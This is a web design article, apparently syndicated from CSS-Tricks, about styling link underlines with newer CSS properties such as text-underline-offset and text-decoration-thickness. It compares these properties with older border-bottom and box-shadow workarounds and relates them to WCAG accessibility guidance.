Color is not used as the only visual means of conveying information, indicating an action, prompting a response, or distinguishing a visual element.
WCAG 2.1

WCAG do not strictly mandate using underlines for links, but it does recommend them. Color blind users need to be able to discern a link. You could differentiate them in other ways, such as with a bold font-weight. Or you could keep this long-established visual affordance. But if we’re going to use underlines, we want them to look nice. Marcin Wichary, a designer at Medium, described the perfect underline as:

[...] visible, but unobtrusive — allowing people to realize what’s clickable, but without drawing too much attention to itself. It should be positioned at just the right distance from the text, sitting comfortably behind it for when descenders want to occupy the same space.

Achieving this has traditionally required CSS tricks.

The hacks we’ve had

This is one trick all developers will be familiar with: border-bottom. By emulating an underline using border-bottom, we gain control over color and thickness. These pseudo-underlines have one problem: an overly large distance from the text. They are underneath the descenders of the letters. You could potentially solve this issue by using line-height, but that comes with its own issues. A similar technique utilises box-shadow. Marcin Wichary pioneered the most sophisticated technique, using background-image to simulate an underline. They were useful hacks but are thankfully no longer needed.

Styling real underlines

Finally we can demarcate links without sacrificing style thanks to two new CSS properties.

  • text-underline-offset controls the position of the underline.
  • text-decoration-thickness controls the thickness of underlines, as well as overlines, and line-throughs.

According to the WebKit blog:

You can also specify from-font to both of these properties which will pull the relevant metric from the used font file itself.

UX agency Clearleft make bold use of (pseudo) underlines, calling clear attention to links with colorful styling. Here’s one example of a faux underline:

a { text-decoration: none; border-bottom: #EA215A 0.125em solid; }

Notice that this fake underline is clearly below the descender of the letter "y":

Here’s the same paragraph, using DevTools to apply the same styling to a real underline using the new CSS properties:

a { text-decoration-color: #EA215A; text-decoration-thickness: .125em; text-underline-offset: 1.5px; }

You’ll notice I’m using the em unit in my example code. The spec strongly encourages using it rather than pixels so that the thickness scales with the font.

These properties have already shipped in Safari and are coming in Firefox 70.

With the move to Chromium for Microsoft’s Edge browser, we will finally have cross browser support for the text-decoration-style property, which offers the options: solid (the default), double, dotted, dashed, and wavy. When combined, these new properties open up a whole range of possibilities.

Perhaps the biggest upgrade for underlines on the web, however, has come without developers needing to do anything. In the bad old days, descenders were unceremoniously sliced through by underlines, which was far from elegant. Developers used to hack around this shortcoming by applying a text-shadow that matched the background color. text-decoration-skip-ink brought a better way to make space for descenders.

The default value of auto (left) and a value of none (right)

Handily, it’s set as the new default value for underlines; meaning the look of underlines has improved while most web developers remain unaware that this property exists. Should you want an underline to cross over glyphs, you can set this property to none.

The post Styling Links with Real Underlines appeared first on CSS-Tricks.

Syndicate content
©2003 - Present Akamai Design & Development.